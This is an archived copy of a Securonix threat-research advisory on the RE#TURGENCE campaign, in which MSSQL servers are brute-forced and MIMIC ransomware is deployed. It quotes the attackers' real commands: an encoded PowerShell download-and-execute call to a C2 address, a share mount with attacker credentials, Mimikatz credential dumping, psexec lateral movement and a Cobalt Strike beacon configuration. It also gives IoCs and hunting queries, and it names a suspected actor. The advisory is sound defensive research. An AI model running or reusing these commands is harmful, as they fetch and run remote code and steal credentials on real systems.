{
	"id": "e59497f0-bb7d-4bf9-b06d-aa4ad3d4a2f9",
	"created_at": "2026-04-06T00:11:17.895948Z",
	"updated_at": "2026-04-10T13:11:52.223748Z",
	"deleted_at": null,
	"sha1_hash": "7e4ae7b93cb4e34865092df5c78802ebac2167e2",
	"title": "Securonix Threat Research Security Advisory: New RE#TURGENCE Attack Campaign: Turkish Hackers Target MSSQL Servers to Deliver Domain-Wide MIMIC Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2931900,
	"plain_text": "Securonix Threat Research Security Advisory: New RE#TURGENCE\r\nAttack Campaign: Turkish Hackers Target MSSQL Servers to Deliver\r\nDomain-Wide MIMIC Ransomware\r\nArchived: 2026-04-05 17:48:30 UTC\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\ntldr: Financially motivated Turkish threat actors appear to be actively targeting MSSQL servers in an effort to deliver\r\nMIMIC ransomware payloads .\r\nThe Securonix Threat Research team has been monitoring an ongoing threat campaign, RE#TURGENCE which involves\r\nthe targeting and exploitation of MSSQL database servers to gain initial access. The threat actors appear to be targeting US,\r\nEU and LATAM countries and are financially motivated.\r\nThe analyzed threat campaign appears to end in one of two ways, either the selling of “access” to the compromised host, or\r\nthe ultimate delivery of ransomware payloads. These details were uncovered during a major OPSEC (operational security)\r\nfailure by the attackers which we’ll dive into later. The timeline for the events was about one month from initial access to the\r\ndeployment of MIMIC ransomware on the victim domain.\r\nThe initial access portion of the campaign is similar to that of DB#JAMMER which we wrote about  last year which also\r\ninvolved direct MSSQL access through brute forcing administrative passwords.\r\nInitial Access (TA0001)\r\nThreat actors have been targeting exposed database servers heavily over the last year. In addition to DB#JAMMER, other\r\ncampaigns targeting these servers have been reported recently, some including obtaining access through botnets.\r\nIn the case of RE#TURGENCE, the threat actors were able to brute force their way into the victim server and leveraged the\r\nuse of the xp_cmdshell procedure to execute commands on the host. Typically, this procedure is disabled by default and\r\nshould not be enabled (especially on publicly exposed servers).\r\nExecution (TA0002)\r\nOnce the attackers were able to execute code through the xp_cmdshell procedure, they executed the following command on\r\nthe server from the sqlservr.exe process:\r\n“C:\\Windows\\system32\\cmd.exe” /c cmd /c powershell -exec bypass -w 1 -e\r\naQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQ\r\nThe command calls cmd.exe were sent twice to execute a PowerShell encoded command which when decoded contains the\r\nfollowing command:\r\niex((New-Object System.Net.Webclient).DownloadString(‘hxxp://88.214.26[.]3:25823/189Jt’))\r\nThe above command downloads a file (189Jt) from the remote server and executes its contained code via a PowerShell\r\ninvoke expression. Essentially, any contained PowerShell code within the file will be downloaded and immediately\r\nexecuted.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 1 of 10\n\nThe PowerShell script is semi-obfuscated while most of the code appears to be ignored. It appears to download and run the\r\nnext stage found at the end of the first script. As seen in the figure below:\r\nFigure 1: PowerShell initial code execution (phase 1)\r\nCobalt Strike implementation\r\nThe next PowerShell script found at hxxp://88.214.26[.]3:25823/MSjku is downloaded and executed in the same manner.\r\nThis script contained a heavily obfuscated Cobalt Strike payload which is loaded into the current running process using in-memory reflection techniques (PowerShell in this case). The script is heavily obfuscated, however our team was able to save\r\nand extract the Cobalt Strike configuration which is found in Appendix A at the end of the report.\r\nThe main focus of the obfuscation was centered around the DLL imports and the Cobalt Strike payload which consisted of\r\nhundreds of lines of combined variables and useless comment blocks.\r\nFigure 2: PowerShell initial code execution (phase 2: Cobalt Strike)\r\nAccording to the configuration, the Cobalt Strike beacon is configured to inject into the Windows-native process\r\nSndVol.exe. This process handles volume controls and settings for the system.\r\nAnyDesk implementation\r\nUsing Cobalt Strike as a main point of code execution, the attackers decided to go for a more hands-on approach. The\r\nAnyDesk binaries were downloaded from a mounted network share that the attackers set up and accessed using the\r\nfollowing command:\r\n“c:\\windows\\system32\\cmd.exe” /c net use f: /delete /y \u0026 net use f: \\\\45.148.121[.]87\\f /user:grogu aqu!8171881cerq\r\nOnce mounted as the “F:\\” drive, the attackers copied the AnyDesk installer to C:\\ad.exe, along with the file ad.bat. The\r\npurpose of ad.bat is to simply install the AnyDesk connector service, add a new local user and add that user to the\r\nadministrators group. The contents of the bat file can be seen in the figure below:\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 2 of 10\n\nFigure 3: File contents of ad.bat\r\nPersistence (TA0003)\r\nYou’ll notice in the ad.bat file that the local user “windows” is created with the password “denek1010”. The user is added to\r\nthe “administrators” (EN) and if present, “administradores” (LATAM) groups. This leads us to believe that these threat\r\nactors built this script with a wide target range in mind.\r\nAdditionally, the script installs the AnyDesk service using the command “c:\\ad.exe  –install c:\\”program files (x86)”\\ –\r\nsilent”, stops and starts the service, and then prints the AnyConnect client ID.\r\nAt this point, the threat actors shifted to exclusively using AnyConnect in favor of Cobalt Strike.\r\nCredential Access (TA0006)\r\nWe observed the threat actors download Mimikatz into the “c:\\users\\windows\\desktop\\x64\\” directory using AnyDesk.\r\nAnother batch script was also downloaded to automate some of the Mimikatz commands. Its contents can be seen in the\r\nfigure below:\r\nFigure 4: File contents of start.bat\r\nThe script performs several functions. First it uses a known registry tweak to enable clear text credentials. It then does a\r\nquick “is Base64” check by looking for the presence of the “C:\\Program Files (x86)” directory and executes Mimikatz from\r\nthe corresponding subdirectory (x86 or x64). The results of the Mimikatz dump are then saved into the Mimikatz_dump.txt\r\nfile.\r\nDiscovery (TA0102)\r\nThe threat actors then shifted gears and decided to get to know the network and domain a bit better. The Advanced Port\r\nScanner utility was downloaded via AnyDesk and saved as c:\\users\\windows\\documents\\advport.exe.\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 3 of 10\n\nOur team observed the following activities from the Advanced Port Scanner utility:\r\nCheck domain controller remote shares (from UI of Advanced Port Scanner)\r\nGet the hostname of a Hyper-V VM host using reg query “HKLM\\Software\\Microsoft\\Virtual\r\nMachine\\guest\\parameters“\r\nTest psexec.exe connection to DC (result fail)\r\nRun psexec.exe on DC using extracted DA passwords(Mimikatz on MSSQL)\r\nTest for the usage of RDP connecting  to DC using dumped creds from Advanced Port Scanner UI (mstsc  /v:\r\n[IP_REDACTED])\r\nCheck for remote shares on jumphosts (from UI of Advanced Port Scanner)\r\nTest for and use RDP connecting to decoy host from Advanced Port Scanner UI (mstsc  /v: [IP_REDACTED])\r\nLateral Movement (TA0008)\r\nEventually after a few days, the threat actors were able to move laterally into two other machines on the network, likely\r\nusing data provided by Mimikatz and the Advanced Port Scanner utility.\r\nThe threat actors transferred in psexec, a Sysinternals utility commonly used by threat actors and red teamers. They used the\r\nutility to open a new session to a domain controller with a domain admin password which was obtained earlier. The\r\nfollowing command was issued on the compromised MSSQL server to move laterally:\r\nc:\\psexec.exe  -u [REDACTED_DOMAIN]\\[REDACTED_USER] -p [REDACTED_PASS] \\\\[REDACTED_IP] cmd.exe\r\nUsing the domain admin account, the threat actors were able to move to other machines from within the domain.\r\nImpact (TA0105)\r\nAt this point, after a few more attempts at lateral movement using psexec, the threat actors appeared to have had enough and\r\ndecided to ransomware the host.\r\nThe ransomware payload was downloaded using AnyDesk and was downloaded into c:\\Users\\windows\\Documents\\ as\r\nred25.exe. This payload is a self-extracting archive that extracts and runs red.exe which is the final ransomware payload.\r\nThe ransomware of choice is Mimic ransomware which uses the legitimate application Everything by VoidTools to query\r\nand locate target files to be encrypted. Mimic was first identified and gained traction in January 2023. Mimic will drop the\r\nEverything binaries used to aid the encryption process. The Mimic dropper in our case “red25.exe” dropped all of the\r\nnecessary files in order for the main ransomware payload to complete its objectives. These files include:\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\global_options.ini\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything2.ini\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything.ini\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything64.dll\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything32.dll\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\everything.exe\r\nc:\\users\\windows\\appdata\\local\\temp\\7zipsfx.000\\7za.exe\r\nThe main Mimic ransomware payload is able to take a few arguments. In the case of the RE#TURGENCE campaign, we\r\nobserved it executing as:\r\n“c:\\users\\windows\\appdata\\local\\[RANDOM_GUID]\\red.exe” -e ul2\r\n“c:\\users\\windows\\appdata\\local\\[RANDOM_GUID]\\red.exe” -e ul1\r\n“c:\\users\\windows\\appdata\\local\\[RANDOM_GUID]\\red.exe” -e watch -pid 4164 -!\r\nAccording to documentation provided by Trend Micro, Mimic ransomware takes the following command line arguments:\r\nCommand line parameter Value/Description\r\n-dir Specify directory\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 4 of 10\n\nCommand line parameter Value/Description\r\n-e\r\nall – Encrypt all (default)\r\nlocal – encrypt local files\r\nnet – encrypt files on Network shares\r\nWatch – ?\r\nul1, ul2 – Create a new thread and try\r\nto unlock certain memory addresses from another process\r\n-prot Prevents the ransomware process from being stopped (protect)\r\n-pid [int value] – The PID of the current running ransomware process\r\nOnce the encryption process was completed, the red.exe process executed the encryption/payment notice which was saved\r\non the victim’s C:\\ drive as “—IMPORTANT—NOTICE—.txt”. The text file contained the following message:\r\nFigure 5: MIMIC ransomware payment notification\r\nIn the end MIMIC ransomware was manually executed by the threat actors and executed on the MSSQL server first, a\r\ndomain controller, and other domain-joined hosts.\r\nBonus Round: Threat actor’s OPSEC failures… Oops!\r\nAs the attack unfolded, we were able to monitor the attackers and the system they were using closely through their own\r\nRMM software. Here are some interesting insights observed as part of the malicious ops.\r\nMTA pc messages/content\r\nNotes/Translation from\r\nTurkish (if needed)\r\nI won’t be able to be in front of the computer for 2 hours. I’m going somewhere\r\nİyi Çalışmalar? Enjoy your work?\r\nSaygılarımızla ; Regards ;\r\nBİLAL EDGÜ BİLAL EDGÜ\r\nSahabiye Mah. Sahabiye Mah.\r\nİstasyon Cad. Station Cad.\r\nAk İşmerkezi Kat:2 No:203 Ak İşmerkezi Floor:2\r\nNo:203\r\nKOCASİNAN / KAYSERİ\r\nEC2AMAZ-55QGUPD Amazon EC2 machine name\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 5 of 10\n\nMTA pc messages/content\r\nNotes/Translation from\r\nTurkish (if needed)\r\nA8EBN4s7hMuFPQm9LIPc8L97wyFfzwnih0yGCTaYC0M*SoyezPrudent0\r\n_zOPwV-8YrF3Y2L2FmggKZ_MZnMHHHv5yBOBC657vhk*SoyezPrudent0\r\nhttps://downloads.systoolsgroup.com/sql-backup-recovery.exe\r\nC:\\”Program Files (x86)”\\AnyDesk-e7eba7df –get-id\r\nEC2AMAZ-55QGUP\r\nAnother Amazon EC2\r\nmachine name\r\nAnyDesk@2023@# A password\r\n[23:24:36] atseverse: I unchecked keep chat history. Then I marked again and these\r\nmessages came again.\r\n[23:27:28] atseverse: Do you have a new goal in Turkey?\r\n[23:27:51] atseverse: Also, since the dollar exchange rate is high in Turkey, isn’t\r\npayment a problem?\r\n[23:28:31] atseverse: unfortunately 1$= 30 Turkish lira\r\n[23:33:30] atseverse: I’m sorry man, I would like to talk to you, but unfortunately I\r\ncame to work.\r\nI have to work, have a nice day\r\n[23:33:55] atseverse: take care of yourself\r\n[23:33:59] atseverse: byee\r\nplease send me anydesk id.\r\nI will come and check\r\nThe first offer I made to you is 15 thousand euros.\r\nI didn’t deceive you. Don’t bargain with me and don’t pay even 1 cent more.\r\nPlease don’t tire me. My aim is not to deceive anyone, I am not a fraudster.\r\nI just want the money I bid for.\r\nSelling access to the\r\ncompromised host\r\nSMMM \u0026 BAĞIMSIZ DENETÇİ CPA \u0026 INDEPENDENT\r\nAUDITOR\r\nDoing a bit of research on the username “atseverse” we came up with all kinds of interesting findings that produce some\r\ntelling information that fits the geographic profile for both Steam, a popular gaming platform, and a hacking website called\r\nspyhackerz:\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 6 of 10\n\nFigure 6: atseverse online profile\r\nC2 and infrastructure\r\nThe RE#TURGENCE campaign consisted of several C2 IP addresses using seemingly random, non-standard port numbers.\r\nThe only domain used, seruvadessigen.3utilities[.]com, was pulled from the Cobalt Strike beacon configuration.\r\nC2 Address Description Details\r\n45.148.121[.]87\r\nSMB Payloads (Cobalt\r\nStrike)\r\nOrganization: ORG-SE92-RIPE\r\nOrg-name: SKB Enterprise B.V.\r\nCountry: NL\r\nAddress: Kingsfordweg 151, 1043 GR Amsterdam,\r\nNetherlands\r\n88.214.26[.]3\r\nPowerShell payloads\r\n(Cobalt Strike)\r\nOrganization: ORG-FI54-RIPE\r\nOrg-name: FutureNow Incorporated\r\nAddress: National Cultural Centre 861 P.O. Box 1492,\r\nVictoria Mahe, Seychelles\r\nseruvadessigen.3utilities[.]com Cobalt Strike beacon URL\r\nRegistrar: Vitalwerks Internet Solutions, LLC / No-IP.com\r\nSecuronix recommendations and mitigations\r\nAlways refrain from exposing critical servers directly to the internet. In the case of RE#TURGENCE attackers were directly\r\nable to brute force their way into the server from outside the main network. We recommend providing access to these\r\nresources behind a much more secure infrastructure such as a VPN. Additionally:\r\nLimit the usage of the xp_cmdshell procedure on MSSQL database servers. This would have prevented the attackers\r\nfrom executing commands on the victim’s machine.\r\nWhen it comes to detecting both RMM and/or RAT-like software, we highly recommend enabling process-level\r\nlogging on endpoints and servers for enhanced telemetry for both detections and threat hunting\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection\r\ncoverage\r\nMonitor for the creation of new local users on endpoints, especially within critical server environments\r\nSecuronix customers can rely on some of the provided provisional detections or scan their environment using the\r\nthreat hunting queries below\r\nMITRE ATT\u0026CK matrix\r\nTactic Technique\r\nInitial Access T1110: Brute Force\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 7 of 10\n\nTactic Technique\r\nDiscovery T1046: Network Service Discovery\r\nDefense Evasion T1112: Modify Registry\r\nPersistence\r\nT1098: Account Manipulation\r\nT1505.001: Server Software Component: SQL Stored Procedures\r\nCredential Access\r\nT1003: OS Credential Dumping\r\nT1110.001: Brute Force: Password Guessing\r\nCommand and Control\r\nT1105: Ingress Tool Transfer\r\nT1572: Protocol Tunneling\r\nT1573.001:  Encrypted Channel: Symmetric Cryptography\r\nT1219: Remote Access Software\r\nImpact T1486: Data Encrypted for Impact\r\nAnalyzed file hashes\r\nFile Name SHA256 (IoC)\r\nad.bat 9F3AD476EDA128752A690BD26D7F9A67A8A4855A187619E74422CC08121AD3D3\r\nps1.ps1\r\nA222BA1FD77A7915A61C8C7A0241222B4AD48DD1C243F3548CAEF23FE985E9C2\r\n1ED02979B3F312C4B2FD1B9CFDFB6BEDE03CD964BB52B3DE017128FE00E10D3C\r\nstart.bat F328C143C24AFB2420964740789F409D2792413A5769A33741ED956FCE5ADD3E\r\nAr3.exe 1C7B82B084DA8B57FFEEF7BDCA955C2AA4A209A96EC70E8D13E67283C10C12A5\r\ngui40.exe 31FEFF32D23728B39ED813C1E7DC5FE6A87DCD4D10AA995446A8C5EB5DA58615\r\nadvport.exe D0C1662CE239E4D288048C0E3324EC52962F6DDDA77DA0CB7AF9C1D9C2F1E2EB\r\nred25.exe E9C63A5B466C286EA252F1B0AA7820396D00BE241FB554CF301C6CD7BA39C5E6\r\nred.exe D6CD0080D401BE8A91A55B006795701680073DF8CD7A0B5BC54E314370549DC4\r\nRelevant provisional Securonix detections\r\nEDR-ALL-11-RU\r\nEDR-ALL-69-BP\r\nEDR-ALL-172-RU\r\nEDR-ALL-987-RU\r\nEDR-ALL-1254-ER, WEL-ALL-1222-ER\r\nEDR-ALL-1278-RU\r\nNTA-ALL-890-ERR\r\nRelevant hunting/Spotter queries (be sure to remove square brackets “[ ]”)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “45.148.121[.]87” OR\r\ndestinationaddress = “88.214.26[.]3”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network\r\nconnection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND\r\n(destinationhostname CONTAINS “seruvadessigen.3utilities[.]com”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND baseeventid = “12” OR baseeventid\r\n= “13” OR baseeventid = “14”) AND customstring47 ENDS WITH\r\n“\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential” AND (customstring48 = “DWORD\r\n(0x00000001)” OR customstring48 = “1”)\r\nindex = activity AND destinationport = “445” OR destinationport = “139”) AND (sourceaddress = “10.0.0.0/8” OR\r\nsourceaddress = “172.16.0.0/12” OR sourceaddress = “192.168.0.0/16” OR sourceaddress = “169.254.0.0/16”) AND\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 8 of 10\n\n(destinationaddress != “10.0.0.0/8” OR destinationaddress != “172.16.0.0/12” OR destinationaddress !=\r\n“192.168.0.0/16” OR destinationaddress != “169.254.0.0/16” OR destinationaddress != “127.0.0.0/8”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Process Create”\r\nAND sourceprocessname ENDS WITH “sqlservr.exe” AND destinationprocessname ENDS WITH “cmd.exe”\r\nindex = activity AND rg_functionality = “Microsoft Windows” AND baseeventid = “4697” AND\r\nresourcecustomfield1 ENDS WITH “anydesk.exe” OR destinationservicename CONTAINS “AnyDesk”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction =\r\n“Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND\r\n(destinationprocessname = “AnyDesk.exe” OR description CONTAINS “AnyDesk” OR product CONTAINS\r\n“AnyDesk”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND deviceaction = “Dns query” AND\r\ndestinationhostname ENDS WITH “anydesk[.]com”\r\nReferences:\r\n1. Securonix Threat Labs Security Advisory: Threat Actors Target MSSQL Servers in DB#JAMMER to Deliver\r\nFreeWorld Ransomware\r\nhttps://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/\r\n2. MySQL servers targeted by ‘Ddostf’ DDoS-as-a-Service botnet\r\nhttps://www.bleepingcomputer.com/news/security/mysql-servers-targeted-by-ddostf-ddos-as-a-service-botnet/\r\n3. xp_cmdshell (Transact-SQL)\r\nhttps://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?\r\nview=sql-server-ver16\r\n4. New Mimic Ransomware Abuses Everything APIs for its Encryption Process\r\nhttps://www.trendmicro.com/en_ph/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html\r\nAppendix A: Cobalt Strike beacon config\r\nCS Beacon:\r\n{\r\n“BeaconType”: [\r\n“HTTPS”\r\n],\r\n“Port”: 443,\r\n“SleepTime”: 37000,\r\n“MaxGetSize”: 1048576,\r\n“Jitter”: 37,\r\n“C2Server”: “seruvadessigen.3utilities.com,/apiv8/getStatus”,\r\n“HttpPostUri”: “/apiv8/updateConfig”,\r\n“Malleable_C2_Instructions”: [],\r\n“HttpGet_Verb”: “GET”,\r\n“HttpPost_Verb”: “POST”,\r\n“HttpPostChunk”: 0,\r\n“Spawnto_x86”: “%windir%\\\\syswow64\\\\SndVol.exe”,\r\n“Spawnto_x64”: “%windir%\\\\sysnative\\\\SndVol.exe”,\r\n“CryptoScheme”: 0,\r\n“Proxy_Behavior”: “Use IE settings”,\r\n“Watermark”: 12345,\r\n“bStageCleanup”: “True”,\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 9 of 10\n\n“bCFGCaution”: “True”,\r\n“KillDate”: 0,\r\n“bProcInject_StartRWX”: “True”,\r\n“bProcInject_UseRWX”: “False”,\r\n“bProcInject_MinAllocSize”: 17500,\r\n“ProcInject_PrependAppend_x86”: [\r\n“kJA=”,\r\n“Empty”\r\n],\r\n“ProcInject_PrependAppend_x64”: [\r\n“kJA=”,\r\n“Empty”\r\n],\r\n“ProcInject_Execute”: [\r\n“ntdll.dll:RtlUserThreadStart”,\r\n“CreateThread”,\r\n“NtQueueApcThread-s”,\r\n“CreateRemoteThread”,\r\n“RtlCreateUserThread”\r\n],\r\n“ProcInject_AllocationMethod”: “VirtualAllocEx”,\r\n“bUsesCookies”: “True”,\r\n“HostHeader”: “”\r\n}\r\nSource: https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers\r\n-to-deliver-domain-wide-mimic-ransomware/\r\nhttps://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/\r\nPage 10 of 10\n\n“\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential” (0x00000001)” OR customstring48 = “1”)  AND (customstring48 = “DWORD\nindex = activity AND destinationport = “445” OR destinationport = “139”) AND (sourceaddress = “10.0.0.0/8” OR\nsourceaddress = “172.16.0.0/12” OR sourceaddress = “192.168.0.0/16” OR sourceaddress = “169.254.0.0/16”) AND\n  Page 8 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware/"
	],
	"report_names": [
		"securonix-threat-research-security-advisory-new-returgence-attack-campaign-turkish-hackers-target-mssql-servers-to-deliver-domain-wide-mimic-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434277,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7e4ae7b93cb4e34865092df5c78802ebac2167e2.pdf",
		"text": "https://archive.orkl.eu/7e4ae7b93cb4e34865092df5c78802ebac2167e2.txt",
		"img": "https://archive.orkl.eu/7e4ae7b93cb4e34865092df5c78802ebac2167e2.jpg"
	}
}